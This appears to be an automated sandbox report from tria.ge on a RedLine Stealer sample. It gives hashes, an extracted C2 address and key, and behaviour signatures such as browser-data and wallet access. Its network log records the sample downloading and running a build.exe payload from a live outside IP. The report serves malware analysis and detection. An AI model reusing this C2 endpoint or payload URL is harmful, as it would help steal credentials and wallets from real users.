Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
50s -
max time network
53s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
25/09/2022, 11:32 UTC
Behavioral task
behavioral1
Sample
0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe
Resource
win7-20220812-en
General
-
Target
0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe
-
Size
361KB
-
MD5
b6608633aed154db58c9430b6e4d26c5
-
SHA1
9b9d0d7cb57b48b8e6db6c8fb292e5322f19dec9
-
SHA256
0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11
-
SHA512
58408b452f99eb74ab7443e8946e45f6bce62c57cef11de0e2fa9123b17d859dcf5edc8a3637d623e4f54790079cad6bf4baf86e9942649f4dc60e059af4e550
-
SSDEEP
6144:eEaXBUcN2BRrn1fH0N6GkBut5adsSEK69yDPhSjYlakxjTLVqoARRSTZAPdg+:/aRDNoVJKRtUdsSEK69yDPhSjYlakxjv
Malware Config
Extracted
redline
0002
13.72.81.58:13413
-
auth_value
866ce0ed8cfe2be77fb43a4912677698
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
resource yara_rule behavioral1/memory/752-54-0x0000000000800000-0x0000000000860000-memory.dmp family_redline behavioral1/files/0x00090000000122f1-59.dat family_redline behavioral1/files/0x00090000000122f1-57.dat family_redline behavioral1/files/0x00090000000122f1-60.dat family_redline behavioral1/memory/1944-61-0x0000000000CB0000-0x0000000000D10000-memory.dmp family_redline -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 1944 build.exe -
Loads dropped DLL 1 IoCs
pid Process 752 0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 752 0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe 752 0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe 1944 build.exe 1944 build.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 752 0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe Token: SeDebugPrivilege 1944 build.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 752 wrote to memory of 1944 752 0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe 28 PID 752 wrote to memory of 1944 752 0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe 28 PID 752 wrote to memory of 1944 752 0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe 28 PID 752 wrote to memory of 1944 752 0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe 28
Processes
-
C:\Users\Admin\AppData\Local\Temp\0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe"C:\Users\Admin\AppData\Local\Temp\0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe"1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
Network
-
GEThttp://13.72.81.58:7766/build.exe0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exeRemote address:13.72.81.58:7766RequestGET /build.exe HTTP/1.1
Host: 13.72.81.58:7766
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Microsoft-HTTPAPI/2.0
Date: Sun, 25 Sep 2022 11:32:35 GMT
-
4.9MB 74.8kB 3366 1692
-
13.72.81.58:7766http://13.72.81.58:7766/build.exehttp0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe6.6kB 383.4kB 142 277
HTTP Request
GET http://13.72.81.58:7766/build.exeHTTP Response
200 -
4.9MB 74.5kB 3360 1696
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
362KB
MD537e39c732e3ec7e26743440e8986e2b0
SHA19637244713aeb6150e123b7d4472114c8bb0e4fa
SHA256b5be007ac6b33d768841aa988ecb6efec133d1765b74bc9ccb516310b9c9ce7c
SHA5127837285fee875c3572110a3ec3aad336f12f320e4d72607dd7d0f7c2669c0694daee7ecea0d4ffe1e36bca59783f0d0cd929f69d2107f567221e1e74d43f76eb
-
Filesize
362KB
MD537e39c732e3ec7e26743440e8986e2b0
SHA19637244713aeb6150e123b7d4472114c8bb0e4fa
SHA256b5be007ac6b33d768841aa988ecb6efec133d1765b74bc9ccb516310b9c9ce7c
SHA5127837285fee875c3572110a3ec3aad336f12f320e4d72607dd7d0f7c2669c0694daee7ecea0d4ffe1e36bca59783f0d0cd929f69d2107f567221e1e74d43f76eb
-
Filesize
362KB
MD537e39c732e3ec7e26743440e8986e2b0
SHA19637244713aeb6150e123b7d4472114c8bb0e4fa
SHA256b5be007ac6b33d768841aa988ecb6efec133d1765b74bc9ccb516310b9c9ce7c
SHA5127837285fee875c3572110a3ec3aad336f12f320e4d72607dd7d0f7c2669c0694daee7ecea0d4ffe1e36bca59783f0d0cd929f69d2107f567221e1e74d43f76eb